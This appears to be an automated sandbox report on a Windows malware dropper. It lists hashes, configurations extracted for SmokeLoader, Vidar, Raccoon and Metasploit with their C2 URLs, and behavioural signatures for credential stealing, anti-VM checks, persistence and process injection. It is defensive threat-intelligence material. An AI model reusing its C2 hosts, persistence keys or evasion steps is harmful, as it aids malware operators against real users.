Resubmissions
19-08-2021 18:59
210819-yrzbdtvqln 1018-08-2021 20:25
210818-4hztrzavcs 1018-08-2021 17:24
210818-9p8lqjhwv2 1017-08-2021 06:12
210817-kl4jvaaq7x 1016-08-2021 10:04
210816-nwc3tqkr3a 1016-08-2021 10:04
210816-5r5rafnh7e 1016-08-2021 10:04
210816-kdgh648t5e 1016-08-2021 09:37
210816-9esgfwsmfe 1016-08-2021 08:13
210816-26la9rblgn 1017-08-2021 08:51
210817-w2l5yq2wlnAnalysis
-
max time kernel
155s -
max time network
287s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
16-08-2021 08:13
Static task
static1
Behavioral task
behavioral1
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win11
Behavioral task
behavioral3
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win10v20210408
Errors
General
-
Target
EB7233922891E1DAD0434FBD52623647.exe
-
Size
7.9MB
-
MD5
eb7233922891e1dad0434fbd52623647
-
SHA1
331126b108532ab9a1e932141bff55a38656bce9
-
SHA256
b39e29c24003441609c457a3455cae9d9fb6f4462f5e06d0c1d317d243711cb8
-
SHA512
597fbb0f397c45c8a2c5f63893c6d6bd4641e952510dfcac05dadb7afaaf4e005df1261649d4e79951979bad0be1fb09feebac7a6d23c31679590cbf40e1d4ac
Malware Config
Extracted
metasploit
windows/single_exec
Extracted
vidar
40
937
https://lenak513.tumblr.com/
-
profile_id
937
Extracted
raccoon
93d3ccba4a3cbd5e268873fc1760b2335272e198
-
url4cnc
https://telete.in/opa4kiprivatem
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Signatures
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
Glupteba Payload 2 IoCs
Processes:
resource yara_rule behavioral3/memory/4308-207-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral3/memory/4308-217-0x00000000015C0000-0x0000000001EE6000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rUNdlL32.eXedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4464 4408 rUNdlL32.eXe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 10 IoCs
Processes:
resource yara_rule behavioral3/memory/1308-148-0x0000000005370000-0x00000000053A0000-memory.dmp family_redline C:\Users\Admin\Documents\fv6XVc_uoD3O9arHr5yy9k2k.exe family_redline C:\Users\Admin\Documents\hKY8VniYB7kDoypSrH3gf9gF.exe family_redline C:\Users\Admin\Documents\fv6XVc_uoD3O9arHr5yy9k2k.exe family_redline C:\Users\Admin\Documents\hKY8VniYB7kDoypSrH3gf9gF.exe family_redline behavioral3/memory/5712-339-0x0000000004EB0000-0x00000000053AE000-memory.dmp family_redline behavioral3/memory/3544-374-0x0000000000418F66-mapping.dmp family_redline behavioral3/memory/3544-387-0x00000000050A0000-0x00000000056A6000-memory.dmp family_redline behavioral3/memory/5156-420-0x0000000000418F82-mapping.dmp family_redline behavioral3/memory/5332-427-0x0000000000418F6A-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 4872 created 4308 4872 svchost.exe Info.exe -
Processes:
resource yara_rule behavioral3/memory/4308-207-0x0000000000400000-0x0000000000D41000-memory.dmp evasion behavioral3/memory/4308-217-0x00000000015C0000-0x0000000001EE6000-memory.dmp evasion C:\Users\Admin\Documents\oqNhLVxhlxKM6YjGsS_9x8pH.exe evasion C:\Users\Admin\Documents\oqNhLVxhlxKM6YjGsS_9x8pH.exe evasion C:\Users\Admin\Documents\oqNhLVxhlxKM6YjGsS_9x8pH.exe evasion C:\Users\Admin\Documents\QBwrEA4oHDK2kN65RvpTOsS5.exe evasion C:\Users\Admin\Documents\gGSI2_kSnGceMRNFFgKWX28N.exe evasion C:\Users\Admin\Documents\QBwrEA4oHDK2kN65RvpTOsS5.exe evasion -
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
-
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral3/memory/5784-332-0x0000000000400000-0x0000000002D15000-memory.dmp family_vidar behavioral3/memory/5784-338-0x00000000049B0000-0x0000000004A4D000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 47 IoCs
Processes:
KRSetp.exe7175645.exe2464796.exe4192468.exe6172656.exeWinHoster.exeFolder.exeFolder.exeInfo.exeInfo.exeInstallation.exeQuu8x8ZMl6ldwF_wtPL3DLIm.exeBtk434tTOK06nw6mkoBp_n6Z.exeoqNhLVxhlxKM6YjGsS_9x8pH.exeIt7kGgbjATGQWRkcPZ4IaJpe.exev_6wCPhLcl2V_gdq2coOqIvq.exefv6XVc_uoD3O9arHr5yy9k2k.exes_1qMRJQ1WKBPJcVMh5ys7tr.exeB5Zne25cheXMr5C6pGJaqOCd.exeWdlRWF3gZ0pgsPt7bgSF6z9A.exex2BFjy8SRtdIV0VKlMSL7WDQ.exe7_LIYre9By4t8bLSgXZIvWBB.exeObvJhkjc1_yeOR8FBjF3Ixme.exeM5Tsem7UcRf8K_HdP1mKYE4H.exehKY8VniYB7kDoypSrH3gf9gF.exedXBNAKqK98ZCDCS5MKKJLYPr.exeLC5HvfJPsti5E1qR_lCFWUiq.exex2BFjy8SRtdIV0VKlMSL7WDQ.exedXBNAKqK98ZCDCS5MKKJLYPr.exeoqNhLVxhlxKM6YjGsS_9x8pH.exeN5awg6WF21NeZ4xqPl67lJoP.exeQBwrEA4oHDK2kN65RvpTOsS5.exegGSI2_kSnGceMRNFFgKWX28N.exeAcakfVHVK3ZpOKofv4SFb_LD.execustomer3.exemd8_8eus.exejooyu.exeQBwrEA4oHDK2kN65RvpTOsS5.exe22222.exejfiag3g_gg.exe8605518.exe6180204.exe1390733.exe4261173.exe7550324.exe3955826.exeWerFault.exepid process 3692 KRSetp.exe 3356 7175645.exe 1452 2464796.exe 1308 4192468.exe 1568 6172656.exe 3832 WinHoster.exe 4148 Folder.exe 4252 Folder.exe 4308 Info.exe 4476 Info.exe 4940 Installation.exe 5600 Quu8x8ZMl6ldwF_wtPL3DLIm.exe 5588 Btk434tTOK06nw6mkoBp_n6Z.exe 5612 oqNhLVxhlxKM6YjGsS_9x8pH.exe 5664 It7kGgbjATGQWRkcPZ4IaJpe.exe 5676 v_6wCPhLcl2V_gdq2coOqIvq.exe 5688 fv6XVc_uoD3O9arHr5yy9k2k.exe 5712 s_1qMRJQ1WKBPJcVMh5ys7tr.exe 5700 B5Zne25cheXMr5C6pGJaqOCd.exe 5784 WdlRWF3gZ0pgsPt7bgSF6z9A.exe 5776 x2BFjy8SRtdIV0VKlMSL7WDQ.exe 5900 7_LIYre9By4t8bLSgXZIvWBB.exe 5968 ObvJhkjc1_yeOR8FBjF3Ixme.exe 5976 M5Tsem7UcRf8K_HdP1mKYE4H.exe 6028 hKY8VniYB7kDoypSrH3gf9gF.exe 6020 dXBNAKqK98ZCDCS5MKKJLYPr.exe 6080 LC5HvfJPsti5E1qR_lCFWUiq.exe 4504 x2BFjy8SRtdIV0VKlMSL7WDQ.exe 5236 dXBNAKqK98ZCDCS5MKKJLYPr.exe 3544 oqNhLVxhlxKM6YjGsS_9x8pH.exe 3940 N5awg6WF21NeZ4xqPl67lJoP.exe 3584 QBwrEA4oHDK2kN65RvpTOsS5.exe 5044 gGSI2_kSnGceMRNFFgKWX28N.exe 2368 AcakfVHVK3ZpOKofv4SFb_LD.exe 420 customer3.exe 4764 md8_8eus.exe 3880 jooyu.exe 5156 QBwrEA4oHDK2kN65RvpTOsS5.exe 5332 22222.exe 5560 jfiag3g_gg.exe 6136 8605518.exe 5064 6180204.exe 5660 1390733.exe 5032 4261173.exe 4772 7550324.exe 2240 3955826.exe 4708 WerFault.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
fv6XVc_uoD3O9arHr5yy9k2k.exehKY8VniYB7kDoypSrH3gf9gF.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fv6XVc_uoD3O9arHr5yy9k2k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fv6XVc_uoD3O9arHr5yy9k2k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion hKY8VniYB7kDoypSrH3gf9gF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion hKY8VniYB7kDoypSrH3gf9gF.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
EB7233922891E1DAD0434FBD52623647.exeInstallation.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation EB7233922891E1DAD0434FBD52623647.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Installation.exe -
Loads dropped DLL 3 IoCs
Processes:
rundll32.exeAcakfVHVK3ZpOKofv4SFb_LD.exepid process 4492 rundll32.exe 2368 AcakfVHVK3ZpOKofv4SFb_LD.exe 2368 AcakfVHVK3ZpOKofv4SFb_LD.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\fv6XVc_uoD3O9arHr5yy9k2k.exe themida C:\Users\Admin\Documents\hKY8VniYB7kDoypSrH3gf9gF.exe themida C:\Users\Admin\Documents\fv6XVc_uoD3O9arHr5yy9k2k.exe themida C:\Users\Admin\Documents\hKY8VniYB7kDoypSrH3gf9gF.exe themida behavioral3/memory/5688-333-0x0000000001370000-0x0000000001371000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
2464796.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 2464796.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
fv6XVc_uoD3O9arHr5yy9k2k.exehKY8VniYB7kDoypSrH3gf9gF.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA fv6XVc_uoD3O9arHr5yy9k2k.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA hKY8VniYB7kDoypSrH3gf9gF.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 157 ip-api.com 55 ipinfo.io 56 ipinfo.io -
Drops file in System32 directory 3 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
fv6XVc_uoD3O9arHr5yy9k2k.exehKY8VniYB7kDoypSrH3gf9gF.exepid process 5688 fv6XVc_uoD3O9arHr5yy9k2k.exe 6028 hKY8VniYB7kDoypSrH3gf9gF.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
svchost.exex2BFjy8SRtdIV0VKlMSL7WDQ.exedXBNAKqK98ZCDCS5MKKJLYPr.exeoqNhLVxhlxKM6YjGsS_9x8pH.exeQBwrEA4oHDK2kN65RvpTOsS5.exegGSI2_kSnGceMRNFFgKWX28N.exedescription pid process target process PID 1152 set thread context of 4660 1152 svchost.exe svchost.exe PID 1152 set thread context of 5160 1152 svchost.exe svchost.exe PID 5776 set thread context of 4504 5776 x2BFjy8SRtdIV0VKlMSL7WDQ.exe x2BFjy8SRtdIV0VKlMSL7WDQ.exe PID 6020 set thread context of 5236 6020 dXBNAKqK98ZCDCS5MKKJLYPr.exe dXBNAKqK98ZCDCS5MKKJLYPr.exe PID 5612 set thread context of 3544 5612 oqNhLVxhlxKM6YjGsS_9x8pH.exe oqNhLVxhlxKM6YjGsS_9x8pH.exe PID 3584 set thread context of 5156 3584 QBwrEA4oHDK2kN65RvpTOsS5.exe QBwrEA4oHDK2kN65RvpTOsS5.exe PID 5044 set thread context of 5332 5044 gGSI2_kSnGceMRNFFgKWX28N.exe 22222.exe -
Drops file in Program Files directory 64 IoCs
Processes:
AcakfVHVK3ZpOKofv4SFb_LD.exeObvJhkjc1_yeOR8FBjF3Ixme.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe ObvJhkjc1_yeOR8FBjF3Ixme.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\libvlccore.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist_jstree.xml AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\view.html AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\01_googleimage.luac AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe ObvJhkjc1_yeOR8FBjF3Ixme.exe File created C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\dailymotion.luac AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html AcakfVHVK3ZpOKofv4SFb_LD.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll AcakfVHVK3ZpOKofv4SFb_LD.exe -
Drops file in Windows directory 2 IoCs
Processes:
MicrosoftEdge.exeWerFault.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 27 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4672 5588 WerFault.exe Btk434tTOK06nw6mkoBp_n6Z.exe 5224 5588 WerFault.exe Btk434tTOK06nw6mkoBp_n6Z.exe 4700 5588 WerFault.exe Btk434tTOK06nw6mkoBp_n6Z.exe 5252 5588 WerFault.exe Btk434tTOK06nw6mkoBp_n6Z.exe 5796 5784 WerFault.exe WdlRWF3gZ0pgsPt7bgSF6z9A.exe 4784 5588 WerFault.exe Btk434tTOK06nw6mkoBp_n6Z.exe 1680 5784 WerFault.exe WdlRWF3gZ0pgsPt7bgSF6z9A.exe 4320 5784 WerFault.exe WdlRWF3gZ0pgsPt7bgSF6z9A.exe 6036 5332 WerFault.exe gGSI2_kSnGceMRNFFgKWX28N.exe 5128 5784 WerFault.exe WdlRWF3gZ0pgsPt7bgSF6z9A.exe 5208 5784 WerFault.exe WdlRWF3gZ0pgsPt7bgSF6z9A.exe 1060 5784 WerFault.exe WdlRWF3gZ0pgsPt7bgSF6z9A.exe 4712 5588 WerFault.exe Btk434tTOK06nw6mkoBp_n6Z.exe 5228 5784 WerFault.exe WdlRWF3gZ0pgsPt7bgSF6z9A.exe 4620 5784 WerFault.exe WdlRWF3gZ0pgsPt7bgSF6z9A.exe 6052 5588 WerFault.exe Btk434tTOK06nw6mkoBp_n6Z.exe 5844 5588 WerFault.exe Btk434tTOK06nw6mkoBp_n6Z.exe 3788 5784 WerFault.exe WdlRWF3gZ0pgsPt7bgSF6z9A.exe 4708 5784 WerFault.exe WdlRWF3gZ0pgsPt7bgSF6z9A.exe 1564 5784 WerFault.exe WdlRWF3gZ0pgsPt7bgSF6z9A.exe 5444 5784 WerFault.exe WdlRWF3gZ0pgsPt7bgSF6z9A.exe 6532 5784 WerFault.exe WdlRWF3gZ0pgsPt7bgSF6z9A.exe 5356 5676 WerFault.exe v_6wCPhLcl2V_gdq2coOqIvq.exe 6196 3356 WerFault.exe 7175645.exe 6748 1568 WerFault.exe 6172656.exe 5244 6136 WerFault.exe 8605518.exe 6440 5064 WerFault.exe 6180204.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
x2BFjy8SRtdIV0VKlMSL7WDQ.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI x2BFjy8SRtdIV0VKlMSL7WDQ.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI x2BFjy8SRtdIV0VKlMSL7WDQ.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI x2BFjy8SRtdIV0VKlMSL7WDQ.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exesvchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 7040 timeout.exe 5744 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 6100 taskkill.exe 5856 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
Info.exesvchost.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" Info.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates Info.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" 